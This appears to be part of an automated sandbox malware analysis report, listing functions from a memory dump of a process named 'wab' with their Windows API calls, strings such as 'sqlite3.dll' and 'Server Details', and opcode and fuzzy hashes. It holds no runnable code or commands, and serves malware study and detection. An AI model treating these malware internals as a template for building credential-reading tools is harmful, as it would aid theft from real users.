                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                                          • String ID: 5\@
                                                                                                                                                                                                          • API String ID: 568519121-3174280609
                                                                                                                                                                                                          • Opcode ID: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                          • Instruction ID: d98da3e135da4b1536afdd38015dbf476e5e9df788621b23f2aabad48e216af8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed9ccc659ae768bed3af4396a7a2ef6749329ac2da06921e4e8f3b6130e41676
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F901D679810204EBDB209F85C881EBBB7F8FF84745F10482AE840A6291D3359D95CB79
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407211 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                                          • String ID: L$ini
                                                                                                                                                                                                          • API String ID: 714388716-4234614086
                                                                                                                                                                                                          • Opcode ID: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                          • Instruction ID: f535223de382355a817e33459d0294d4a206ca3c03f6505affaa6c17102478c3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40617556e3c7fadddb40d0723bbaf5de75b625f9ab2653ee00342fdf7e802ddb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE01B2B1D10218AFDF40DFA9D845ADEBBF4BB08348F14812AE515E6240EBB895458F99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041104F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • failed memory resize %u to %u bytes, xrefs: 00411074
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _msizerealloc
                                                                                                                                                                                                          • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                          • API String ID: 2713192863-2134078882
                                                                                                                                                                                                          • Opcode ID: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                          • Instruction ID: 1811babadabc61a025a406b62bb89d9ddf1cf6d87da65dd644d5d85db6a8a765
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f373e1ad7fcf1c0b49eed94f59212a9c5cf39ccd3639a4d1fec466c2720d2c36
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12D0C23290C2207EEA122644BC06A5BBB91DF90370F10C51FF618951A0DA3A8CA0638A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408DE1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemCount.USER32(?), ref: 00408CA2
                                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408CC6
                                                                                                                                                                                                            • Part of subcall function 00408C8C: GetMenuItemInfoA.USER32(?), ref: 00408CFC
                                                                                                                                                                                                            • Part of subcall function 00408C8C: memset.MSVCRT ref: 00408D29
                                                                                                                                                                                                            • Part of subcall function 00408C8C: strchr.MSVCRT ref: 00408D35
                                                                                                                                                                                                            • Part of subcall function 00408C8C: _mbscat.MSVCRT ref: 00408D90
                                                                                                                                                                                                            • Part of subcall function 00408C8C: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00408DAC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                          • String ID: menu_%d
                                                                                                                                                                                                          • API String ID: 1129539653-2417748251
                                                                                                                                                                                                          • Opcode ID: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                          • Instruction ID: fc9d5e34a24bd2be33db7f468ba420a1802cee0dbde2c18454a4e056650a0418
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30b56b049a2eb5bda87ce11c85315f509722c2b72e9c228685a229b9196fe7c0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96D0C23064174022FB3023266D0EF4B29595BC3B47F1400AEF400B10D2CBBC400486BE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406D34: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409576,00000000,00409494,?,00000000,00000104), ref: 00406D3F
                                                                                                                                                                                                          • strrchr.MSVCRT ref: 00409579
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040958E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                          • API String ID: 3334749609-1948609170
                                                                                                                                                                                                          • Opcode ID: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                          • Instruction ID: 2d2b68270352c45da0ce721119a0fec427a5e2ae0c2a4fc26ba4743072087242
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 169f9a88f7015fda69d2ff589ea03c9427a0f81af7901bdb9d43f3987180f798
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C080521466A024F1173222AD03B4F05844F5370CF25005BFD01351C3EF9D453141FF
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406E81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                          • String ID: sqlite3.dll
                                                                                                                                                                                                          • API String ID: 1983510840-1155512374
                                                                                                                                                                                                          • Opcode ID: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                          • Instruction ID: b4f080e30331be102d7f345a143f57ec91a882a22c28ed8e87256c61ce2af050
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 680d605fc7031f1bb097eb1115807af08001ddb79e65e6985d80c366fbe9924b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3C0803240513125BB0177717C028AF7D48DF82394B01046EF58561111DD694D3255EB
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004033A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044551F,34@,0000007F,?), ref: 004033BA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileString
                                                                                                                                                                                                          • String ID: 34@$Server Details
                                                                                                                                                                                                          • API String ID: 1096422788-1041202369
                                                                                                                                                                                                          • Opcode ID: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                                          • Instruction ID: 5dc36b059aaaf95d4d37dbe6dd28276a8f332030ee7f3b0879c7395586969e1a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5e07b1729637358d3cbf99362b971886faaa8c49ae95f38c817c63fe3903b9a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFC04C36948B01BBDE029F909D05F1EBE62BBA8B01F504519F285210AB82754524EB26
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0042BE74 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                          • Opcode ID: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                                          • Instruction ID: 1cbfd9147006f86015284e0c7f96a5a033359537089e49602f9f07bbf2bf02d4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2cf12dda973bb4c216f8cbd091c1f622c493a2bbdd48a3f51df23d375ad87cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B761DE72604702AFDB20DF65E981A6BB7E4FF44304F44492EFA5982250D738ED54CBDA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004081FD Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3110682361-0
                                                                                                                                                                                                          • Opcode ID: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                                          • Instruction ID: 82d09d3ec766172f421874171fbd662b4eebf604b8883e80537bb62e226e9057
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 248d061ae36dd9180c5fbe6d0462f2886f4330fdc0375cf8b316066c10295751
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631F832D0011D9BDF10DB64CD81BDEBBB8EF55314F1005BAE984B7281DA799E85CB94
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00415B07 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3510742995-0
                                                                                                                                                                                                          • Opcode ID: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                                          • Instruction ID: c59a560e0875e34eddc7238b356bca14a42e0d2f6379eea325777a24e0ec34d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E11E6B7D00618ABDB01DFA4DC899DEB7ACEB49310F414836FA05CB140E634E2488799
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004096FB Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                          • Opcode ID: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                                          • Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%